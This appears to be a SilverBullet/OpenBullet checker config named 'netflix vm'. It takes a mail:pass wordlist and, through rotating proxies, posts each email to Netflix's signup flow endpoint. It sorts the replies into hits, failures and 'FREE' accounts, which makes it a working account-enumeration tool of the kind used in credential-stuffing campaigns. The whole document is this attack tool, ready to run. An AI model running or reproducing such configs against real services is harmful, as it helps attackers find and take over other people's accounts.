[SETTINGS]
{
  "Name": "netflix vm",
  "SuggestedBots": 50,
  "MaxCPM": 0,
  "LastModified": "2021-12-29T00:46:34.9357731+02:00",
  "AdditionalInfo": "",
  "RequiredPlugins": [],
  "Author": "@uzzzul",
  "Version": "1.1.2 [SB]",
  "SaveEmptyCaptures": false,
  "ContinueOnCustom": false,
  "SaveHitsToTextFile": false,
  "IgnoreResponseErrors": false,
  "MaxRedirects": 8,
  "NeedsProxies": true,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "BanProxyAfterGoodStatus": false,
  "BanLoopEvasionOverride": -1,
  "EncodeData": false,
  "AllowedWordlist1": "",
  "AllowedWordlist2": "MailPass",
  "DataRules": [],
  "CustomInputs": [],
  "CaptchaUrl": "",
  "IsBase64": false,
  "FilterList": [],
  "EvaluateMathOCR": false,
  "SecurityProtocol": 0,
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "QuitOnBanRetry": false,
  "AcceptInsecureCertificates": true,
  "DisableNotifications": false,
  "DisableImageLoading": false,
  "DefaultProfileDirectory": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": "",
  "Title": "netflix vm",
  "IconPath": "Icon\\svbfile.ico",
  "LicenseSource": null,
  "Message": null,
  "MessageColor": "#FFFFFFFF",
  "HitInfoFormat": "[{hit.Type}][{hit.Proxy}] {hit.Data} - [{hit.CapturedString}]",
  "AuthorColor": "#FFFFB266",
  "WordlistColor": "#FFB5C2E1",
  "BotsColor": "#FFA8FFFF",
  "CustomInputColor": "#FFD6C7C7",
  "CPMColor": "#FFFFFFFF",
  "ProgressColor": "#FFAD93E3",
  "HitsColor": "#FF66FF66",
  "CustomColor": "#FFFFB266",
  "ToCheckColor": "#FF7FFFD4",
  "FailsColor": "#FFFF3333",
  "RetriesColor": "#FFFFFF99",
  "OcrRateColor": "#FF4698FD",
  "ProxiesColor": "#FFFFFFFF"
}

[SCRIPT]
#esn FUNCTION RandomString "?u?u?u?u?u?u-?d?d-?u?u?u?d?u?u?u?u?u?u?u?u?d?d?u?u?u?u?d?d?u?u?u?u?d?u?d?u?d?u" -> VAR "esn" 

#get REQUEST GET "https://www.netflix.com/lb-en/Login" 
  
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: */*" 

#authURL PARSE "<SOURCE>" LR "name=\"authURL\" value=\"" "\"" -> VAR "authURL1" 

#authURL FUNCTION Unescape "<authURL1>" -> VAR "authURL" 

#login REQUEST POST "https://www.netflix.com/api/shakti/vcf9bb2c2/flowendpoint?flow=signupSimplicity&mode=welcome&landingURL=%2F&landingOrigin=https%3A%2F%2Fwww.netflix.com&inapp=false&esn=<esn>&languages=en-US&netflixClientPlatform=browser" 
  CONTENT "{\"flow\":\"signupSimplicity\",\"mode\":\"welcome\",\"authURL\":\"<authURL1>\",\"action\":\"saveAction\",\"fields\":{\"email\":{\"value\":\"<USER>\"}}}" 
  CONTENTTYPE "application/json" 
  HEADER ": scheme: https" 
  HEADER "accept: application/json, text/javascript, */*; q=0.01" 
  HEADER "accept-encoding: gzip, deflate, br" 
  HEADER "accept-language: en-US,en;q=0.9" 
  HEADER "content-length: 1907" 
  HEADER "content-type: application/json" 
  HEADER "origin: https://www.netflix.com" 
  HEADER "referer: https://www.netflix.com/lb-en/LoginHelp" 
  HEADER "sec-fetch-dest: empty" 
  HEADER "sec-fetch-mode: cors" 
  HEADER "sec-fetch-site: same-origin" 
  HEADER "sec-gpc: 1" 
  HEADER "user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36" 
  HEADER "x-netflix.client.request.name: ui/xhrUnclassified" 
  HEADER "x-requested-with: XMLHttpRequest" 

KEYCHECK 
  KEYCHAIN Failure OR 
    KEY "\"mode\":\"registrationWithContext\"" 
  KEYCHAIN Success OR 
    KEY "\"mode\":\"switchFlow\"" 
  KEYCHAIN Custom "FREE" OR 
    KEY "\"mode\":\"passwordOnly\"" 

#author FUNCTION Constant "@uzzzul" -> CAP "configby" 

